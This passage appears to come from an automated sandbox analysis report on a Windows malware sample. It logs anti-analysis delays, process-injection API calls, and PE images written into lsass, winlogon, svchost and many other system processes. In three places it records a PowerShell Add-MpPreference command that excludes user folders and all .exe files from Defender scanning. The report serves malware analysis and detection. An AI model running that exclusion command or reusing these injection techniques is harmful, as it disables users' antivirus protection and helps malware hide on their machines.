          Source: C:\Windows\System32\svchost.exe TID: 1016 Thread sleep count: 241 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1016 Thread sleep time: -241000s >= -30000s
          Source: C:\Windows\System32\dwm.exe TID: 1428 Thread sleep count: 9873 > 30
          Source: C:\Windows\System32\dwm.exe TID: 1428 Thread sleep time: -9873000s >= -30000s
          Source: C:\Windows\System32\dllhost.exe TID: 2676 Thread sleep count: 612 > 30
          Source: C:\Windows\System32\dllhost.exe TID: 2676 Thread sleep time: -61200s >= -30000s
          Source: C:\Windows\System32\dllhost.exe TID: 5588 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5696 Thread sleep count: 250 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5696 Thread sleep time: -250000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2136 Thread sleep count: 252 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2136 Thread sleep time: -252000s >= -30000s
          Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\dialer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
          Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
          Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
          Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe Code function: 32_2_000001D29E8CE110 FindFirstFileExW 32_2_000001D29E8CE110
          Source: C:\Windows\System32\winlogon.exe Code function: 50_2_000002D0165EE110 FindFirstFileExW 50_2_000002D0165EE110
          Source: C:\Windows\System32\lsass.exe Code function: 64_2_000002D6F151E110 FindFirstFileExW 64_2_000002D6F151E110
          Source: C:\Windows\System32\conhost.exe Code function: 68_2_00000146F6B0E110 FindFirstFileExW 68_2_00000146F6B0E110
          Source: C:\Windows\System32\svchost.exe Code function: 69_2_0000014E41FDE110 FindFirstFileExW 69_2_0000014E41FDE110
          Source: C:\Windows\System32\dwm.exe Code function: 70_2_000001D15B08E110 FindFirstFileExW 70_2_000001D15B08E110
          Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node (graph_45-624)
          Source: C:\Windows\System32\dialer.exe API call chain: ExitProcess graph end node
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\System32\conhost.exe Code function: 32_2_000001D29E8C81C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter 32_2_000001D29E8C81C0
          Source: C:\Windows\System32\dialer.exe Code function: 66_2_0000000140832D30 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect 66_2_0000000140832D30
          Source: C:\Windows\System32\dialer.exe Code function: 26_2_0000000140001C9C GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,StrStrIW,StrStrIW,StrNCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrNCatW,StrCatW,StrCatW,StrCatW,StrStrIW,StrCatW,StrCpyW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree 26_2_0000000140001C9C
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
          Source: C:\Windows\System32\conhost.exe Code function: 32_2_000001D29E8CD6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter 32_2_000001D29E8CD6D4
          Source: C:\Windows\System32\conhost.exe Code function: 32_2_000001D29E8C8528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess 32_2_000001D29E8C8528
          Source: C:\Windows\System32\winlogon.exe Code function: 50_2_000002D0165ED6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter 50_2_000002D0165ED6D4
          Source: C:\Windows\System32\winlogon.exe Code function: 50_2_000002D0165E8528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess 50_2_000002D0165E8528
          Source: C:\Windows\System32\winlogon.exe Code function: 50_2_000002D0165E81C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter 50_2_000002D0165E81C0
          Source: C:\Windows\System32\lsass.exe Code function: 64_2_000002D6F1518528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess 64_2_000002D6F1518528
          Source: C:\Windows\System32\lsass.exe Code function: 64_2_000002D6F15181C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter 64_2_000002D6F15181C0
          Source: C:\Windows\System32\lsass.exe Code function: 64_2_000002D6F151D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter 64_2_000002D6F151D6D4
          Source: C:\Windows\System32\dialer.exe Code function: 65_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit 65_2_0000000140001160
          Source: C:\Windows\System32\conhost.exe Code function: 68_2_00000146F6B0D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter 68_2_00000146F6B0D6D4
          Source: C:\Windows\System32\conhost.exe Code function: 68_2_00000146F6B08528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess 68_2_00000146F6B08528
          Source: C:\Windows\System32\conhost.exe Code function: 68_2_00000146F6B081C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter 68_2_00000146F6B081C0
          Source: C:\Windows\System32\svchost.exe Code function: 69_2_0000014E41FD8528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess 69_2_0000014E41FD8528
          Source: C:\Windows\System32\svchost.exe Code function: 69_2_0000014E41FDD6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter 69_2_0000014E41FDD6D4
          Source: C:\Windows\System32\svchost.exe Code function: 69_2_0000014E41FD81C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter 69_2_0000014E41FD81C0
          Source: C:\Windows\System32\dwm.exe Code function: 70_2_000001D15B08D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter 70_2_000001D15B08D6D4
          Source: C:\Windows\System32\dwm.exe Code function: 70_2_000001D15B0881C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter 70_2_000001D15B0881C0
          Source: C:\Windows\System32\dwm.exe Code function: 70_2_000001D15B088528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess 70_2_000001D15B088528

          HIPS / PFW / Operating System Protection Evasion

          Source: 0.3.egFMhHSlmf.exe.224120834b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
          Source: 26.2.dialer.exe.1400050b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
          Source: 29.2.powershell.exe.217e6d49610.10.raw.unpack, RunPE.cs .Net Code: Run contains injection code
          Source: 29.2.powershell.exe.217ef310000.16.raw.unpack, RunPE.cs .Net Code: Run contains injection code
          Source: 37.3.updater.exe.17ade7634b0.0.raw.unpack, RunPE.cs .Net Code: Run contains injection code
          Source: 63.2.dialer.exe.1400050b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
          Source: 67.2.powershell.exe.28199a8ab70.15.raw.unpack, RunPE.cs .Net Code: Run contains injection code
          Source: 0.3.egFMhHSlmf.exe.224120834b0.1.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
          Source: 0.3.egFMhHSlmf.exe.224120834b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
          Source: 0.3.egFMhHSlmf.exe.224120834b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
          Source: 0.3.egFMhHSlmf.exe.224120834b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
          Source: 0.3.egFMhHSlmf.exe.224120834b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\dllhost.exe Code function: 45_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,OpenProcess,TerminateProcess, 45_2_0000000140002434
          Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 16582AC0
          Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: F14E2AC0
          Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 41FA2AC0
          Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: F32B2AC0
          Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 9FD62AC0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 1D15B020000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 1D15B050000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 246ED7B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 200A1980000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22E670C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275D1FC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BBDC90000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 227D8FC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2DED2C70000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 220AEFD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241B6940000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 202A22A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14D25AA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A63950000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1834ABC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 256EBEB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2568E1B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 226A7DC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 12A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22B68FC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207EA5B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE9B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 11CD6340000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207C0460000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 245A2150000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24708EB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F60740000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26E569B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1D63DC20000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A799B20000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F6963C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26481BB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 166D2D90000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 128DE440000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2101D0E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 86A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192D1E50000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26DD2000000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 257155B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 16443E50000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6FC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968280000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9452E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 29227D20000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5C00000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22C4F660000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE850000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 281CF7C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28843650000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1FBADCF0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 40D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2BEDFE40000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FFD2D10000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B38FD50000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D8FD7A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: EA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2DD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2D20000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 26E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 22C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1460000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1150000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2620000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2F20000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2940000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: FF0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2560000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2880000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2E50000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3110000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EF0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: C00000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: D70000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 25D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2B40000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 7F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 6E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2890000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: EB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2FC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 27F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 13C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 7E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: A30000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 740000 value starts with: 4D5A
